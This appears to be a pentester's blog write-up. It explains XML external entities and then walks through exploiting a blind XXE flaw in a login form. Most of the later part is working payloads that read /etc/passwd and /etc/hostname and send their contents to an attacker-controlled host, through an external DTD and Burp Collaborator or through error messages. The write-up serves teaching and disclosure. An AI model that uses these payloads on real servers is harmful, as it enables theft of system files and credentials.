Today I will talk about a severe vulnerability I found during a real pentesting exercise. More precisely, I was able to exploit XXE in order to “blindly” exfiltrate system files from a server using SSRF and an error-based technique.
XML stands for “Extensible Markup Language”, and is a language designed for transferring and storing data. It is really similar to HTML, since it uses tag-based syntax and tree structures. However, XML does not use predefined tags, but each tag can be named according the data it contains.
XML Document Type Definition
The structure and types of data of an XML document are defined in the Document Type Definition (DTD), which is declared within the optional DOCTYPE element at the start of the document.
What is interesting about the DTD declaration is that it can be fully contained in the document (internal DTD), loaded from an external resource (external DTD) or a mix of both.
An XML element is everything placed within the start tag and the end tag (both included).
<user> <name>Peter</name> <age>23</age> </user>
These elements can be declared within the DTD:
<!DOCTYPE user [ <!ELEMENT user (name,age,email,address)> <!ELEMENT name (#PCDATA)> <!ELEMENT age (#PCDATA)> <!ELEMENT email (#PCDATA)> <!ELEMENT address (#PCDATA)> ]>
Here, <!DOCTYPE user states that the root element of the document is user. <!ELEMENT user (name,age,email,address)> declares that the user element must contain the elements name, age, email and address, which will be #PCDATA (Parseable Character DATA).
XML Custom Entities
XML entities are ways of referencing data in the document instead of using the data itself. They can be though of as variables withing the XML document.
Some of these entities are built in the specification of the XML language, like < and >, which represent the < and > symbols.
However, we can define our own custom entities within the DTD:
<!DOCTYPE foo [ <!ENTITY test "This is a test message" > ]> <name> Peter </name> <message> &test; </message>
As you can see, we are defining a custom entity called test which can be referenced from the document body. The result is the following:
<name> Peter </name> <message> This is a test message </message>
XML External Entities (XXE)
There is a special type of XML entities called External Entities, which reference data placed outsite the DTD and the document itself. This kind of XML entities are defined with the SYSTEM keyword and must include a URL:
<!DOCTYPE foo [ <!ENTITY external SYSTEM "http://my-website.com/" > ]>
The URL can use the file:// protocol, which means it will load a local file.
XXE Basic Exfiltration
At this point, we can exploit this functionality if the parser is not configured properly. Imagine a website which allows us to change our user data sending the following XML document:
<!DOCTYPE user> <name> Peter </name> <email> firstname.lastname@example.org </email> <age> 23 </age>
An attacker could intercept the query using a proxy and change its content:
<!DOCTYPE user [ <!ENTITY xxe SYSTEM "file:///etc/passwd" > ]> <name> Peter </name> <email> &xxe; </email> <age> 23 </age>
As you can imagine, the parser will load the content of /etc/passwd into the xxe external entity, so when we visit the user profile in the webpage, instead of the email we will see the exfiltrated file.
XML Parameter Entities
There is a special XML Entity which can only be referenced within the DTD and is called Parameter Entity. When a Parameter Entity is declared, the % symbol must be included before the entity name:
<!DOCTYPE foo [ <!ENTITY % parameterentity "This is a parameter entity declaration"> %parameterentity; ]>
This can be used, for example, to import DTD entities from an external resource:
<!DOCTYPE foo [ <!ENTITY % newentity SYSTEM "http://my-website.com/new_entity.dtd"> %newentity; ]>
If the content of new_entity.dtd is:
<!ENTITY test "This is an imported test entity!">
The %newentity parameter entity will be replaced for its content, and the DTD will look like:
<!DOCTYPE foo [ <!ENTITY % newentity SYSTEM "http://my-website.com/new_entity.dtd"> <!ENTITY test "This is an imported test entity!"> ]>
So the entity &test; can be referenced from the XML document.
My story: XXE exfiltration
Recently, during a pentesting exercise, I found a website whith a login panel which sent the login data using an XML document:
This is really uncommon, and the first thing that came to my mind was testing some XXE payloads. The problem was the server will only return wether or not the credentials were valid so, although we could insert an external entity referencing a local file like /etc/passwd, we won’t be able to read its content, since the server will not show us the content of the id_user or ds_password elements.
Blind SSRF Out-Of-Band Exfiltration
My first idea was to exfiltrate its content using SSRF. If we can insert an entity referencing an external host under our control, we can use parameter entities to exfiltrate data within GET parameters. Let’s see how.
First of all, I checked whether or not XXE was working by forcing a SSRF. For this PoC I used Burpsuite’s Collaborator.
<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [<!ENTITY file SYSTEM "http://ynpi60potmi91th8urquqriqihobc0.burpcollaborator.net">]> <request> <login type="group"> <row> <id_user>&file;</id_user> <ds_password><![CDATA[YWRtaW4=]]></ds_password> <version><![CDATA]></version> </row> </login> </request>
The Collaborator client received a GET request from the IP of the website, so at this point I knew I was on the right path.
The next step was to load a file as a parameter entity and include it in the URL as a GET parameter:
<!DOCTYPE test [ <!ENTITY % data SYSTEM "file:///etc/hostname"><!ENTITY % xxe SYSTEM "http://hm72m0c6ajo29zoi8alrpb43vu1lpa.burpcollaborator.net?data=%data;"> %xxe; ]>
However, this will not work since the parameter %data; from the URL is parsed as a literal string.
My second try was about embedding an entity within another entity:
<!ENTITY % file SYSTEM "file:///etc/hostname"> <!ENTITY % eval "<!ENTITY % xxe SYSTEM 'http://hm72m0c6ajo29zoi8alrpb43vu1lpa.burpcollaborator.net?data=%data;'>"> %eval; %xxe;
Which will result in the following error:
<message>The parameter entity reference "%data;" cannot occur within markup in the internal subset of the DTD.</message>
So I tried to load the xxe parameter entity from an external resource:
<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ENTITY % data SYSTEM "file:///etc/hostname"> <!ENTITY % eval SYSTEM "http://<my-ip>:8080/entity.xml"> %eval; ]> <request> <login type="group"> <row> <id_user>&xxe;</id_user> <ds_password><![CDATA[YWRtaW4=]]></ds_password> <version><![CDATA]></version> </row> </login> </request>
Where the file my-ip:8080/entity.xml was:
<!ENTITY % all "<!ENTITY xxe SYSTEM 'http://s92csubifg43nn32glcocl4k4baayz.burpcollaborator.net?collect=%data;'>"> %all;
This did not raise the previous exception and worked as expected. Our Collaborator client received the following request:
As you can see, the collect parameter contained the web server hostname, so the exfiltration worked perfectly!
The problem here was that larger files included characters which were not URL-encoded. We could have used PHP to encode them, but it didn’t work.
At this point I realized that, each time I sent a malformed XML document, the server returned a stack trace with the error. If I tried to read an unexistant file, the server would raise an exception and return a message similar to “The file /unexistant/file.txt does not exist”.
What if instead of a file name I tried to open the content of a file?
So I tried the following payload:
<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ENTITY % data SYSTEM "file:///etc/passwd"> <!ENTITY % xxe SYSTEM "http://<my-ip>:8080/error.xml"> %xxe; ]> <request> <login type="group"> <row> <id_user> &error; </id_user> <ds_password><![CDATA[YWRtaW4=]]></ds_password> <version><![CDATA]></version> </row> </login> </request>
Where the file error.xml was:
<!ENTITY % eval "<!ENTITY error SYSTEM 'file:///nonexistent/%data;'>"> %eval;
And voilà! The server raised an exception where we could read the content of /etc/passwd!
The server tried to read the file /nonexistent/root:x:0:0:root… which obviously didn’t exist, so it raised an exception where we could see the whole filename, which actually is the content of /etc/passwd.
Honestly, when I started working as a pentester a couple of months ago I didn’t expect to find CTF-like situations like this one. An attacker could exfiltrate the content of files like the ones stored at /home/<user>/.ssh/ an even gain SSH access to the server, which is critical!
I hope you found this article as interesting as I did. See ya!